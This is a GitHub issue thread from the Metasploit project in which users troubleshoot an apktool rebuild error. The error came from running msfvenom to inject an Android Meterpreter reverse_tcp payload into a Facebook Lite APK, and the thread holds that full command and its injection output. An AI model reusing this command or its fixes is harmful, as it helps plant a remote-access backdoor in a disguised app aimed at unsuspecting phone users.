### ISSUE TITLE
Cannot generate payload with apktool. how fix it????

### ISSUE THREAD

**Issue by rootvis** [rapid7/metasploit-framework#11320]
when iam run this command on my kali linux desktop

msfvenom -x facebook.apk -p android/meterpreter/reverse_tcp LHOST=(ip) LPORT=4444 R>/home/vishnu/payload.apk

i getting this error 

[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.facebook.lite.fybhu
[*] Loading /tmp/d20190127-960-dk7cyy/original/smali/com/facebook/lite/ClientApplicationSplittedShell.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Rebuilding facebook.apk with meterpreter injection as /tmp/d20190127-960-dk7cyy/output.apk
[-] I: Using Apktool 2.3.4-dirty
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources has changed...
I: Building resources...
W: aapt: brut.common.BrutException: brut.common.BrutException: Could not extract resource: /prebuilt/aapt/linux/aapt (defaulting to $PATH binary)
W: First type is not attr!
W: A/        ( 1109): First type is not attr!
brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 134): [aapt, p, --min-sdk-version, 14, --target-sdk-version, 26, --version-code, 135459355, --version-name, 126.0.0.4.99, --no-version-vectors, -F, /tmp/APKTOOL6453242601197931305.tmp, -0, xzs, -0, assets/secondary-program-dex-jars/secondary.dex.jar.xzs, -0, png, -0, jpg, -0, arsc, -I, /home/name/.local/share/apktool/framework/1.apk, -S, /tmp/d20190127-960-dk7cyy/original/res, -M, /tmp/d20190127-960-dk7cyy/original/AndroidManifest.xml]
Error: Unable to rebuild apk with apktool

**Comment by hacksoldier98** [comment]
If you can send the output 

Java -v? 

Can be that you use a last version beacuse apktool want another version java

**Comment by vishnu666007** [comment]
@hacksoldier98 
java --version

openjdk 11.0.2 2018-10-16
OpenJDK Runtime Environment (build 11.0.2+7-Debian-1)
OpenJDK 64-Bit Server VM (build 11.0.2+7-Debian-1, mixed mode, sharing)

**Comment by vishnu666007** [comment]
@hacksoldier98 I think iam using the latest version

**Comment by vishnu666007** [comment]
@victorfdez82 iam tested in facebook_lite it just 2 mb

**Comment by CristoDDario** [comment]
MI DA ERRORE DI COMPILAZIONE  DA 3 MESI

**Comment by aungsoehein** [comment]
Same here. I also get this error.Not only Msfvenom but also fatrat apktook the problem are the same .how to solve this problem ?

**Comment by hiddenwishes** [comment]
these are the multiple i things that solved this problem

#solution for backdoor apk(compile decompile error)

apt-get install zipalign
apt-get update
apt-get upgrade
apt-get install lib32z1 lib32ncurses5 lib32bz2-1.0 lib32stdc++6

sudo apt-get install lib32stdc++6 lib32z1 lib32z1-dev

apt-get full-upgrade

apktool empty-framework-dir


#@dsx12 There is not. If you find one - let me know. Maybe they can take some of my open bugs. #This issue you have reported and it seems spread to various bug trackers is a combination of issues.

  #  You need latest Apktool to have the latest AOSP framework file. Otherwise you are forced to pass the updated framework to Apktool. It seems you are up to date. So if you upgraded to a newer Apktool, you might have an old cached previous framework file. That is where apktool empty-framework-dir comes into play. It removes those, so the newer version of Apktool running can write a new framework file.
#
 ##  This error reporting has two issues that have been fixed for months. These issues however need to be fixed with aapt2, not aapt1. As of now, you need to opt into aapt2 with the --use-aapt2 flag during build. Applications originally built with aapt2 have issues building with the older aapt1. Attempts have been made to identify what version of aapt` built an application, but that ticket has been on the back-burner.

#So after point 2, there is no bug in metasploit, but perhaps a feature request for msfvenom to use that parameter (--use-aapt2) on an optional basis.

#The other issues reported on Debian/Kali just don't make sense. People seem to be making up "missing jars" and what not. None of those stacktraces have anything to do with missing jar files. They are #about more restrictive applications when building, which loops back to outdated frameworks and aapt1 vs aapt2.

#Finally, in this bug report - https://bugs.kali.org/view.php?id=5126. The user has this warning line.

#W: aapt: brut.common.BrutException: brut.common.BrutException: Could not extract resource: /prebuilt/aapt/linux/aapt (defaulting to $PATH binary)

**Comment by alimack7** [comment]
hii Buddy i am geting this problem 
#W: aapt: brut.common.BrutException: brut.common.BrutException: Could not extract resource: /prebuilt/aapt/linux/aapt (defaulting to $PATH binary) 



what should i do please help me! plz!

**Comment by hash30** [comment]
How to request msfvenom to use that parameter (--use-aapt2) on an optional basis?
@hiddenwishes

**Comment by PranshuBasak** [comment]
how do i use apt , it is not been recognised by neither msfvenom nor metasploit, can u please ping the usag of apt in metasploit

**Comment by bcoles** [comment]
> 
> 
> how do i use apt , it is not been recognised by neither msfvenom nor metasploit, can u please ping the usag of apt in metasploit

```
man apt
```

**Comment by sayasss** [comment]
> when iam run this command on my kali linux desktop
> 
> msfvenom -x facebook.apk -p android/meterpreter/reverse_tcp LHOST=(ip) LPORT=4444 R>/home/vishnu/payload.apk
> 
> i getting this error
> 
> [_] Creating signing key and keystore.. [_] Decompiling original APK.. [_] Decompiling payload APK.. [_] Locating hook point.. [_] Adding payload as package com.facebook.lite.fybhu [_] Loading /tmp/d20190127-960-dk7cyy/original/smali/com/facebook/lite/ClientApplicationSplittedShell.smali and injecting payload.. [_] Poisoning the manifest with meterpreter permissions.. [_] Adding [_] Adding [_] Adding [_] Adding [_] Adding [*] Rebuilding facebook.apk with meterpreter injection as /tmp/d20190127-960-dk7cyy/output.apk [-] I: Using Apktool 2.3.4-dirty I: Checking whether sources has changed... I: Smaling smali folder into classes.dex... I: Checking whether resources has changed... I: Building resources... W: aapt: brut.common.BrutException: brut.common.BrutException: Could not extract resource: /prebuilt/aapt/linux/aapt (defaulting to $PATH binary) W: First type is not attr! W: A/ ( 1109): First type is not attr! brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 134): [aapt, p, --min-sdk-version, 14, --target-sdk-version, 26, --version-code, 135459355, --version-name, 126.0.0.4.99, --no-version-vectors, -F, /tmp/APKTOOL6453242601197931305.tmp, -0, xzs, -0, assets/secondary-program-dex-jars/secondary.dex.jar.xzs, -0, png, -0, jpg, -0, arsc, -I, /home/name/.local/share/apktool/framework/1.apk, -S, /tmp/d20190127-960-dk7cyy/original/res, -M, /tmp/d20190127-960-dk7cyy/original/AndroidManifest.xml] Error: Unable to rebuild apk with apktool

Solved After 2 days what about you guys..?

**Comment by ehashwatthama** [comment]
There is a wrapper script you need to replace it with following commands in the bottom of the script which i've mentioned in the screenshot.
 
# add current location to path for aapt
PATH=$PATH:`pwd`;
**export PATH="/usr/local/bin:$PATH"**
exec java $javaOpts -jar "$jarpath" "$@"

![Screenshot 2023-07-04 180505](https://github.com/rapid7/metasploit-framework/assets/138479559/bc0b8c3a-9f4e-4396-8738-7f07393b4486)

**Comment by Anonymous-Hash30** [comment]
> > when iam run this command on my kali linux desktop
> > msfvenom -x facebook.apk -p android/meterpreter/reverse_tcp LHOST=(ip) LPORT=4444 R>/home/vishnu/payload.apk
> > i getting this error
> > [_] Creating signing key and keystore.. [_] Decompiling original APK.. [_] Decompiling payload APK.. [_] Locating hook point.. [_] Adding payload as package com.facebook.lite.fybhu [_] Loading /tmp/d20190127-960-dk7cyy/original/smali/com/facebook/lite/ClientApplicationSplittedShell.smali and injecting payload.. [_] Poisoning the manifest with meterpreter permissions.. [_] Adding [_] Adding [_] Adding [_] Adding [_] Adding [*] Rebuilding facebook.apk with meterpreter injection as /tmp/d20190127-960-dk7cyy/output.apk [-] I: Using Apktool 2.3.4-dirty I: Checking whether sources has changed... I: Smaling smali folder into classes.dex... I: Checking whether resources has changed... I: Building resources... W: aapt: brut.common.BrutException: brut.common.BrutException: Could not extract resource: /prebuilt/aapt/linux/aapt (defaulting to $PATH binary) W: First type is not attr! W: A/ ( 1109): First type is not attr! brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 134): [aapt, p, --min-sdk-version, 14, --target-sdk-version, 26, --version-code, 135459355, --version-name, 126.0.0.4.99, --no-version-vectors, -F, /tmp/APKTOOL6453242601197931305.tmp, -0, xzs, -0, assets/secondary-program-dex-jars/secondary.dex.jar.xzs, -0, png, -0, jpg, -0, arsc, -I, /home/name/.local/share/apktool/framework/1.apk, -S, /tmp/d20190127-960-dk7cyy/original/res, -M, /tmp/d20190127-960-dk7cyy/original/AndroidManifest.xml] Error: Unable to rebuild apk with apktool
> 
> Solved After 2 days what about you guys..?

Please share the steps to fix it.

**Comment by bcoles** [comment]
This issue is 4 years old.

This issue is closed.

The issue title "Cannot generate payload with apktool. how fix it????" is generic.

The OP was using a very old version of Apktool (`2.3.4-dirty`).

The OP has deleted their account.

There are 12 different people involved in this thread, yet no information was provided to reproduce this issue and the issue template was never completed.

Ensure you have installed the latest version of Apktool and ensure `apktool` is in your environment `PATH`.

If you have an issue create a new issue and be sure to complete the issue template:

* https://github.com/rapid7/metasploit-framework/issues/new/choose

Locked.
